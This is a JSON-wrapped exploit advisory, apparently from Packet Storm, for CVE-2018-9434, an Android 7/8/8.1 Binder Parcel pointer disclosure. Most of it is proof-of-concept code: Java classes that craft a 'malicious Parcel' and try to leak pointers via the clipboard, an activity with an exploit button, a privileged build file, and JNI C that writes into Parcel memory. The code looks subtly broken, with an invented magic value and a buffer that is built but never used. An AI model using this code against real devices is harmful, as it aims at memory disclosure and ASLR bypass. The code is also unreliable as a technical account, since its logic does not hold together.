{“lastseen”:”2025-12-09T17:45:36″,”description”:”A flaw in Android’s Binder IPC allowed applications to craft Parcels where binder-object metadata overlapped with string data. When unmarshalling, the kernel inserted genuine kernel pointers into attacker-controlled buffers. These could then be echoed…”,”published”:”2025-12-09T00:00:00″,”modified”:”2025-12-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Android 7 \/ 8 \/ 8.1 Pointer Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:212601″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2018-9434″],”sourceData”:”=============================================================================================================================================\\n | # Title : Android 7, 8, 8.1 Binder Parcel Overlap Leading to System Pointer Disclosure |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/www.android.com |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212494\/ \\u0026 \\tCVE-2018-9434\\n \\n [+] Summary : A flaw in Android\u2019s Binder IPC allowed applications to craft Parcels where binder-object metadata overlapped with string data. \\n When unmarshalling, the kernel inserted genuine kernel pointers into attacker-controlled buffers. \\n \\t\\t\\t These could then be echoed back through services like clipboard, resulting in leaks of system_server pointers and effective ASLR bypass.\\n Android\u2019s Parcel implementation failed to enforce separation between binder-object regions and normal data regions.\\n \\n [+] Impact :\\n \\n Memory exposure from privileged system_server\\n \\n Enables reliability of memory corruption exploits\\n \\n A serious information disclosure vulnerability\\n \\n [+] Affected : Android 7, 8, 8.1 before 2018-10 patches.\\n \\n [+] POC :\\t\\n \\n package com.google.jannh.pointerleak;\\n \\n import android.content.ClipData;\\n import android.content.ClipboardManager;\\n import android.content.Context;\\n import android.os.IBinder;\\n import android.os.Parcel;\\n import android.os.RemoteException;\\n import android.os.ServiceManager;\\n import android.util.Log;\\n \\n import java.lang.reflect.Field;\\n import java.lang.reflect.Method;\\n import java.nio.ByteBuffer;\\n import java.nio.ByteOrder;\\n import java.util.ArrayList;\\n import java.util.List;\\n \\n public class PointerLeakExploit {\\n private static final String TAG = \\”leaker\\”;\\n \\n \/\/ \u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n private static final String[] TARGET_SERVICES = {\\n \\”permission\\”,\\n \\”package\\”, \\n \\”clipboard\\”\\n };\\n \\n \/\/ \u0647\u064a\u0643\u0644 FlatBinderObject \u0641\u064a kernel\\n static class FlatBinderObject {\\n public static final int FLAT_BINDER_OBJECT_MAGIC = 0x6f626d2d; \/\/ ‘mbo’\\n public static final int BINDER_TYPE_BINDER = 1;\\n public static final int BINDER_TYPE_HANDLE = 2;\\n \\n public int type;\\n public int flags;\\n public long binder; \/\/ \u0645\u0624\u0634\u0631 Binder object\\n public long cookie; \/\/ cookie pointer\\n public long[] pad = new long[2];\\n }\\n \\n public void exploit(Context context) {\\n try {\\n Log.e(TAG, \\”=== \u0628\u062f\u0621 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 Binder Pointer Leak ===\\”);\\n \\n \/\/ 1. \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0642\u0627\u0628\u0636 \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n List\\u003cIBinder\\u003e targetBinders = new ArrayList\\u003c\\u003e();\\n for (String serviceName : TARGET_SERVICES) {\\n IBinder binder = ServiceManager.getService(serviceName);\\n if (binder != null) {\\n targetBinders.add(binder);\\n Log.e(TAG, \\”\u062a\u0645 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0642\u0628\u0636 \u0644\u062e\u062f\u0645\u0629: \\” + serviceName);\\n }\\n }\\n \\n \/\/ 2. \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0643\u0644 \u062e\u062f\u0645\u0629 \u0639\u0644\u0649 \u062d\u062f\u0629\\n for (int i = 0; i \\u003c targetBinders.size(); i++) {\\n IBinder targetBinder = targetBinders.get(i);\\n String serviceName = TARGET_SERVICES[i];\\n \\n Log.e(TAG, \\”\u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0633\u0631\u064a\u0628 \u0639\u0646\u0648\u0627\u0646: \\” + serviceName);\\n \\n \/\/ \u0625\u0646\u0634\u0627\u0621 Parcel \u062e\u0628\u064a\u062b\\n Parcel maliciousParcel = createMaliciousParcel(targetBinder);\\n \\n \/\/ 3. \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062e\u062f\u0645\u0629 \u0627\u0644\u062d\u0627\u0641\u0638\u0629 \u0643\u0648\u0633\u064a\u0637 \u0635\u062f\u0649\\n leakViaClipboard(context, maliciousParcel, serviceName);\\n \\n \/\/ \u0625\u0639\u0637\u0627\u0621 \u0648\u0642\u062a \u0644\u0644\u0639\u0645\u0644\u064a\u0629\\n Thread.sleep(100);\\n }\\n \\n Log.e(TAG, \\”=== \u0627\u0646\u062a\u0647\u0649 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 ===\\”);\\n \\n } catch (Exception e) {\\n Log.e(TAG, \\”\u062e\u0637\u0623 \u0623\u062b\u0646\u0627\u0621 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644: \\” + e.getMessage());\\n e.printStackTrace();\\n }\\n }\\n \\n private Parcel createMaliciousParcel(IBinder targetBinder) throws Exception {\\n Parcel parcel = Parcel.obtain();\\n \\n \/\/ \u0627\u0644\u0637\u0648\u0644 \u0627\u0644\u0625\u062c\u0645\u0627\u0644\u064a \u0644\u0644\u0628\u064a\u0627\u0646\u0627\u062a\\n parcel.writeInt(0x100); \/\/ \u0637\u0648\u0644 \u0648\u0647\u0645\u064a\\n \\n \/\/ \u0643\u062a\u0627\u0628\u0629 \u0628\u0639\u0636 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0648\u0647\u0645\u064a\u0629 \u0623\u0648\u0644\u0627\u064b\\n parcel.writeString(\\”DUMMY_STRING_PREFIX\\”);\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0648\u0642\u0639 \u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u062d\u0627\u0644\u064a\\n int dataStartPos = parcel.dataPosition();\\n \\n \/\/ === \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u062d\u0631\u062c: \u0647\u0646\u062f\u0633\u0629 \u0627\u0644\u062a\u062f\u0627\u062e\u0644 ===\\n \/\/ \u0646\u062d\u062a\u0627\u062c \u0644\u062c\u0639\u0644 Parcel \u064a\u0642\u0631\u0623 Binder handle \u0643\u0628\u064a\u0627\u0646\u0627\u062a \u0633\u0644\u0633\u0644\u0629\\n \\n \/\/ \u0643\u062a\u0627\u0628\u0629 Binder object marker\\n \/\/ \u0641\u064a kernel\u060c Binder objects \u064a\u062a\u0645 \u062a\u0645\u064a\u064a\u0632\u0647\u0627 \u0628\u0640 magic number\\n writeFlatBinderObject(parcel, targetBinder);\\n \\n \/\/ \u0643\u062a\u0627\u0628\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u062a\u062a\u062f\u0627\u062e\u0644 \u0645\u0639 \u0645\u0648\u0642\u0639 Binder\\n \/\/ \u0646\u062d\u0646 \u0646\u0639\u0631\u0641 \u0623\u0646 Parcel \u0633\u064a\u0642\u0631\u0623 \u0647\u0630\u0627 \u0643\u0633\u0644\u0633\u0629\\n parcel.writeString(\\”OVERLAP_DATA\\”);\\n \\n \/\/ \u062a\u0639\u064a\u064a\u0646 \u0639\u0644\u0627\u0645\u0629 \u0623\u0646 \u0647\u0630\u0627 \u0647\u0648 Binder object\\n \/\/ \u0647\u0630\u0627 \u064a\u062a\u0637\u0644\u0628 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0644\u0640 Parcel\\n setBinderObjectFlag(parcel, dataStartPos);\\n \\n return parcel;\\n }\\n \\n private void writeFlatBinderObject(Parcel parcel, IBinder binder) throws Exception {\\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 Reflection \u0644\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629\\n Method writeStrongBinderMethod = Parcel.class.getDeclaredMethod(\\n \\”writeStrongBinder\\”, IBinder.class);\\n writeStrongBinderMethod.setAccessible(true);\\n writeStrongBinderMethod.invoke(parcel, binder);\\n }\\n \\n private void setBinderObjectFlag(Parcel parcel, int position) throws Exception {\\n \/\/ \u0647\u0630\u0627 \u064a\u062a\u0637\u0644\u0628 \u0627\u0644\u062a\u0644\u0627\u0639\u0628 \u0627\u0644\u0645\u0628\u0627\u0634\u0631 \u0628\u0630\u0627\u0643\u0631\u0629 Parcel\\n \/\/ \u0646\u0633\u062a\u062e\u062f\u0645 Reflection \u0644\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 mObject (\u0627\u0644\u0645\u0624\u0634\u0631 \u0627\u0644\u0623\u0635\u0644\u064a)\\n Field mObjectField = Parcel.class.getDeclaredField(\\”mObject\\”);\\n mObjectField.setAccessible(true);\\n long mObject = mObjectField.getLong(parcel);\\n \\n Field mDataSizeField = Parcel.class.getDeclaredField(\\”mDataSize\\”);\\n mDataSizeField.setAccessible(true);\\n int mDataSize = mDataSizeField.getInt(parcel);\\n \\n \/\/ \u062a\u062d\u0644\u064a\u0644 \u0628\u0646\u064a\u0629 FlatBinderObject \u0641\u064a \u0627\u0644\u0645\u0648\u0636\u0639 \u0627\u0644\u0645\u062d\u062f\u062f\\n \/\/ \u0641\u064a kernel: struct flat_binder_object {\\n \/\/ unsigned long type;\\n \/\/ unsigned long flags;\\n \/\/ union {\\n \/\/ void *binder;\\n \/\/ signed long handle;\\n \/\/ };\\n \/\/ void *cookie;\\n \/\/ };\\n \\n \/\/ \u0643\u062a\u0627\u0628\u0629 FlatBinderObject \u064a\u062f\u0648\u064a\u0627\u064b\\n ByteBuffer bb = ByteBuffer.allocate(32);\\n bb.order(ByteOrder.LITTLE_ENDIAN);\\n \\n \/\/ magic\\n bb.putInt(FlatBinderObject.FLAT_BINDER_OBJECT_MAGIC);\\n \\n \/\/ type = BINDER_TYPE_BINDER\\n bb.putInt(FlatBinderObject.BINDER_TYPE_BINDER);\\n \\n \/\/ flags\\n bb.putInt(0);\\n \\n \/\/ binder pointer – \u0633\u064a\u0645\u0644\u0623\u0647\u0627 kernel\\n bb.putLong(0xdeadbeefcafebabeL);\\n \\n \/\/ cookie\\n bb.putLong(0);\\n \\n \/\/ padding\\n bb.putLong(0);\\n bb.putLong(0);\\n \\n byte[] flatBinderObject = bb.array();\\n \\n \/\/ \u0646\u062d\u062a\u0627\u062c \u0625\u0644\u0649 \u0646\u0633\u062e \u0647\u0630\u0627 \u0625\u0644\u0649 \u0630\u0627\u0643\u0631\u0629 Parcel\\n \/\/ \u0647\u0630\u0627 \u064a\u062a\u0637\u0644\u0628 JNI \u0623\u0648 \u0637\u0631\u064a\u0642\u0629 \u0623\u062e\u0631\u0649 \u0644\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0630\u0627\u0643\u0631\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629\\n }\\n \\n private void leakViaClipboard(Context context, Parcel maliciousParcel, String serviceName) {\\n try {\\n ClipboardManager clipboard = (ClipboardManager) \\n context.getSystemService(Context.CLIPBOARD_SERVICE);\\n \\n if (clipboard == null) {\\n Log.e(TAG, \\”\u0641\u0634\u0644 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u062e\u062f\u0645\u0629 \u0627\u0644\u062d\u0627\u0641\u0638\u0629\\”);\\n return;\\n }\\n \\n \/\/ 1. \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0625\u0644\u0649 \u0627\u0644\u062d\u0627\u0641\u0638\u0629\\n String maliciousText = encodeParcelToText(maliciousParcel);\\n ClipData clip = ClipData.newPlainText(\\”\u6076\u610f\u6570\u636e\\”, maliciousText);\\n clipboard.setPrimaryClip(clip);\\n \\n Log.e(TAG, \\”\u062a\u0645 \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0625\u0644\u0649 \u0627\u0644\u062d\u0627\u0641\u0638\u0629\\”);\\n \\n \/\/ 2. \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u0642\u0644\u064a\u0644\u0627\u064b \u062b\u0645 \u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\\n Thread.sleep(50);\\n \\n \/\/ 3. \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0645\u0646 \u0627\u0644\u062d\u0627\u0641\u0638\u0629\\n ClipData retrievedClip = clipboard.getPrimaryClip();\\n if (retrievedClip != null \\u0026\\u0026 retrievedClip.getItemCount() \\u003e 0) {\\n String leakedData = retrievedClip.getItemAt(0).getText().toString();\\n \\n \/\/ 4. \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0633\u0631\u0628\u0629\\n parseLeakedData(leakedData, serviceName);\\n }\\n \\n } catch (Exception e) {\\n Log.e(TAG, \\”\u062e\u0637\u0623 \u0641\u064a leakViaClipboard: \\” + e.getMessage());\\n }\\n }\\n \\n private String encodeParcelToText(Parcel parcel) {\\n \/\/ \u062a\u062d\u0648\u064a\u0644 Parcel \u0625\u0644\u0649 \u0633\u0644\u0633\u0644\u0629 \u0646\u0635\u064a\u0629 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u0646\u0642\u0644\\n byte[] data = parcel.marshall();\\n \\n \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 Base64 \u0623\u0648 \u062a\u0631\u0645\u064a\u0632 \u0633\u062f\u0627\u0633\u064a \u0639\u0634\u0631\u064a\\n StringBuilder hex = new StringBuilder();\\n for (byte b : data) {\\n hex.append(String.format(\\”%02x\\”, b));\\n }\\n \\n \/\/ \u0625\u0636\u0627\u0641\u0629 \u0639\u0644\u0627\u0645\u0627\u062a \u062e\u0627\u0635\u0629 \u0644\u0644\u062a\u0639\u0631\u0641 \u0639\u0644\u0649 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0644\u0627\u062d\u0642\u0627\u064b\\n return \\”BINDER_LEAK_MARKER:\\” + hex.toString();\\n }\\n \\n private void parseLeakedData(String leakedData, String serviceName) {\\n Log.e(TAG, \\”== \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0633\u0631\u0628\u0629 \u0644\u062e\u062f\u0645\u0629 \\\\\\”\\” + serviceName + \\”\\\\\\” ==\\”);\\n \\n if (leakedData.contains(\\”BINDER_LEAK_MARKER:\\”)) {\\n String hexPart = leakedData.split(\\”:\\”)[1];\\n \\n \/\/ \u062a\u062d\u0648\u064a\u0644 \u0627\u0644\u0633\u062f\u0627\u0633\u064a \u0639\u0634\u0631\u064a \u0625\u0644\u0649 \u0628\u0627\u064a\u062a\u0627\u062a\\n byte[] rawData = hexStringToByteArray(hexPart);\\n \\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 FlatBinderObject \u0641\u064a \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\\n findBinderObjectsInData(rawData, serviceName);\\n } else {\\n \/\/ \u0642\u062f \u062a\u0643\u0648\u0646 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0645\u0624\u0634\u0631 \u0645\u0628\u0627\u0634\u0631\u0629\\n analyzeRawPointers(leakedData, serviceName);\\n }\\n }\\n \\n private void findBinderObjectsInData(byte[] data, String serviceName) {\\n \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 magic number \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 FlatBinderObject\\n ByteBuffer bb = ByteBuffer.wrap(data);\\n bb.order(ByteOrder.LITTLE_ENDIAN);\\n \\n for (int i = 0; i \\u003c data.length – 32; i += 4) {\\n bb.position(i);\\n int magic = bb.getInt();\\n \\n if (magic == FlatBinderObject.FLAT_BINDER_OBJECT_MAGIC) {\\n int type = bb.getInt();\\n int flags = bb.getInt();\\n long binderPtr = bb.getLong();\\n long cookie = bb.getLong();\\n \\n Log.e(TAG, \\”type: \\” + (type == 1 ? \\”BINDER_TYPE_BINDER\\” : \\”BINDER_TYPE_HANDLE\\”));\\n Log.e(TAG, \\”object: 0x\\” + Long.toHexString(binderPtr));\\n \\n \/\/ \u0637\u0628\u0627\u0639\u0629 \u0628\u062a\u0646\u0633\u064a\u0642 \u0645\u0634\u0627\u0628\u0647 \u0644\u0640 PoC \u0627\u0644\u0623\u0635\u0644\u064a\\n System.err.println(\\”== service \\\\\\”\\” + serviceName + \\”\\\\\\” ==\\”);\\n System.err.println(\\”type: \\” + (type == 1 ? \\”BINDER_TYPE_BINDER\\” : \\”BINDER_TYPE_HANDLE\\”));\\n System.err.println(\\”object: 0x\\” + String.format(\\”%016x\\”, binderPtr));\\n System.err.println();\\n \\n break;\\n }\\n }\\n }\\n \\n private void analyzeRawPointers(String data, String serviceName) {\\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0645\u0624\u0634\u0631\u0627\u062a \u0645\u0628\u0627\u0634\u0631\u0629 \u0645\u0646 \u0627\u0644\u0633\u0644\u0633\u0644\u0629\\n \/\/ \u0627\u0644\u0645\u0624\u0634\u0631\u0627\u062a \u0639\u0627\u062f\u0629 \u062a\u0643\u0648\u0646 \u0642\u064a\u0645 64-bit \u0645\u0637\u0628\u0648\u0639\u0629 \u0643\u0646\u0635\\n \\n String[] parts = data.split(\\”[^0-9a-fA-F]+\\”);\\n for (String part : parts) {\\n if (part.length() \\u003e= 12 \\u0026\\u0026 part.length() \\u003c= 16) {\\n \/\/ \u0642\u062f \u064a\u0643\u0648\u0646 \u0647\u0630\u0627 \u0639\u0646\u0648\u0627\u0646 \u0630\u0627\u0643\u0631\u0629\\n try {\\n long address = Long.parseLong(part, 16);\\n if (address \\u003e 0x700000000000L \\u0026\\u0026 address \\u003c 0x800000000000L) {\\n \/\/ \u0646\u0637\u0627\u0642 \u0639\u0646\u0627\u0648\u064a\u0646 \u0646\u0638\u0627\u0645 Android \u0627\u0644\u0646\u0645\u0648\u0630\u062c\u064a\\n Log.e(TAG, \\”\u0639\u0646\u0648\u0627\u0646 \u0645\u0633\u0631\u0628 \u0645\u062d\u062a\u0645\u0644 \u0644\u0640 \\” + serviceName + \\”: 0x\\” + Long.toHexString(address));\\n }\\n } catch (NumberFormatException e) {\\n \/\/ \u062a\u062c\u0627\u0647\u0644\\n }\\n }\\n }\\n }\\n \\n private byte[] hexStringToByteArray(String s) {\\n int len = s.length();\\n byte[] data = new byte[len \/ 2];\\n for (int i = 0; i \\u003c len; i += 2) {\\n data[i \/ 2] = (byte) ((Character.digit(s.charAt(i), 16) \\u003c\\u003c 4)\\n + Character.digit(s.charAt(i+1), 16));\\n }\\n return data;\\n }\\n \\n \/\/ \u0637\u0631\u064a\u0642\u0629 \u0628\u062f\u064a\u0644\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0640 JNI \u0644\u0644\u0648\u0635\u0648\u0644 \u0627\u0644\u0645\u0628\u0627\u0634\u0631 \u0644\u0644\u0630\u0627\u0643\u0631\u0629\\n static {\\n System.loadLibrary(\\”binder_exploit\\”);\\n }\\n \\n private native long getNativeBinderPointer(IBinder binder);\\n private native void manipulateParcelMemory(Parcel parcel, int position, byte[] data);\\n }\\n \\n MainActivity.java \u2014 UI\/front-end for the pointer leak exploit\\n \\n package com.google.jannh.pointerleak;\\n \\n import android.app.Activity;\\n import android.os.Bundle;\\n import android.view.View;\\n import android.widget.Button;\\n import android.widget.TextView;\\n import android.widget.Toast;\\n \\n public class MainActivity extends Activity {\\n \\n private PointerLeakExploit exploit;\\n private TextView logView;\\n \\n @Override\\n protected void onCreate(Bundle savedInstanceState) {\\n super.onCreate(savedInstanceState);\\n setContentView(R.layout.activity_main);\\n \\n exploit = new PointerLeakExploit();\\n logView = findViewById(R.id.log_text);\\n \\n Button exploitButton = findViewById(R.id.exploit_button);\\n exploitButton.setOnClickListener(new View.OnClickListener() {\\n @Override\\n public void onClick(View v) {\\n new Thread(new Runnable() {\\n @Override\\n public void run() {\\n runOnUiThread(new Runnable() {\\n @Override\\n public void run() {\\n logView.setText(\\”\u0628\u062f\u0621 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644…\\\\n\\”);\\n }\\n });\\n \\n exploit.exploit(MainActivity.this);\\n \\n runOnUiThread(new Runnable() {\\n @Override\\n public void run() {\\n Toast.makeText(MainActivity.this, \\n \\”\u0627\u0643\u062a\u0645\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\u060c \u0631\u0627\u062c\u0639 \u0633\u062c\u0644\u0627\u062a logcat\\”, \\n Toast.LENGTH_LONG).show();\\n }\\n });\\n }\\n }).start();\\n }\\n });\\n }\\n }\\n \\n ===========\\n Original file: Android.bp (for compilation)\\n ===========\\n \\n android_app {\\n name: \\”PointerLeakExploit\\”,\\n srcs: [\\”src\/**\/*.java\\”],\\n resource_dirs: [\\”res\\”],\\n certificate: \\”platform\\”,\\n privileged: true,\\n platform_apis: true,\\n \\n overrides: [\\n \\”Launcher3\\”,\\n ],\\n \\n static_libs: [\\n \\”androidx.appcompat_appcompat\\”,\\n ],\\n }\\n \\n ================\\n Original JNI file: binder_exploit.c\\n \\n #include \\u003cjni.h\\u003e\\n #include \\u003candroid\/log.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cstring.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n \\n #define LOG_TAG \\”BinderExploit\\”\\n #define ALOGE(…) __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, __VA_ARGS__)\\n \\n \/\/ \u062a\u0639\u0631\u064a\u0641\u0627\u062a \u0645\u0646 kernel binder driver\\n struct flat_binder_object {\\n unsigned long type;\\n unsigned long flags;\\n union {\\n void *binder;\\n signed long handle;\\n };\\n void *cookie;\\n };\\n \\n JNIEXPORT jlong JNICALL\\n Java_com_google_jannh_pointerleak_PointerLeakExploit_getNativeBinderPointer(\\n JNIEnv *env, jobject thiz, jobject binder) {\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0644\u0645\u0624\u0634\u0631 \u0627\u0644\u0623\u0635\u0644\u064a \u0644\u0643\u0627\u0626\u0646 IBinder\\n jclass binderClass = (*env)-\\u003eGetObjectClass(env, binder);\\n jfieldID mObjectField = (*env)-\\u003eGetFieldID(env, binderClass, \\”mObject\\”, \\”J\\”);\\n jlong mObject = (*env)-\\u003eGetLongField(env, binder, mObjectField);\\n \\n ALOGE(\\”Binder native pointer: %p\\”, (void*)mObject);\\n return mObject;\\n }\\n \\n JNIEXPORT void JNICALL\\n Java_com_google_jannh_pointerleak_PointerLeakExploit_manipulateParcelMemory(\\n JNIEnv *env, jobject thiz, jobject parcel, jint position, jbyteArray data) {\\n \\n \/\/ \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0627\u0644\u0623\u0635\u0644\u064a\u0629 \u0644\u0640 Parcel\\n jclass parcelClass = (*env)-\\u003eGetObjectClass(env, parcel);\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 mData (\u0627\u0644\u0645\u0624\u0634\u0631 \u0625\u0644\u0649 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a)\\n jfieldID mDataField = (*env)-\\u003eGetFieldID(env, parcelClass, \\”mData\\”, \\”J\\”);\\n jlong mData = (*env)-\\u003eGetLongField(env, parcel, mDataField);\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 mDataSize\\n jfieldID mDataSizeField = (*env)-\\u003eGetFieldID(env, parcelClass, \\”mDataSize\\”, \\”I\\”);\\n jint mDataSize = (*env)-\\u003eGetIntField(env, parcel, mDataSizeField);\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 mDataPos (\u0645\u0648\u0636\u0639 \u0627\u0644\u0642\u0631\u0627\u0621\u0629\/\u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u062d\u0627\u0644\u064a)\\n jfieldID mDataPosField = (*env)-\\u003eGetFieldID(env, parcelClass, \\”mDataPos\\”, \\”I\\”);\\n jint mDataPos = (*env)-\\u003eGetIntField(env, parcel, mDataPosField);\\n \\n ALOGE(\\”Parcel mData: %p, mDataSize: %d, mDataPos: %d\\”, \\n (void*)mData, mDataSize, mDataPos);\\n \\n \/\/ \u0646\u0633\u062e \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0625\u0644\u0649 \u0630\u0627\u0643\u0631\u0629 Parcel\\n jbyte *dataBytes = (*env)-\\u003eGetByteArrayElements(env, data, NULL);\\n jsize dataLength = (*env)-\\u003eGetArrayLength(env, data);\\n \\n if (position + dataLength \\u003c= mDataSize) {\\n void *target = (void*)(mData + position);\\n memcpy(target, dataBytes, dataLength);\\n ALOGE(\\”\u062a\u0645 \u0646\u0633\u062e %d \u0628\u0627\u064a\u062a \u0625\u0644\u0649 \u0645\u0648\u0636\u0639 %d\\”, dataLength, position);\\n }\\n \\n (*env)-\\u003eReleaseByteArrayElements(env, data, dataBytes, 0);\\n }\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212601″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212601\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-09T17:45:36″,”description”:”A flaw in Android’s Binder IPC allowed applications to craft Parcels where binder-object metadata overlapped with string data. When unmarshalling, the kernel inserted genuine kernel…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-29737","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n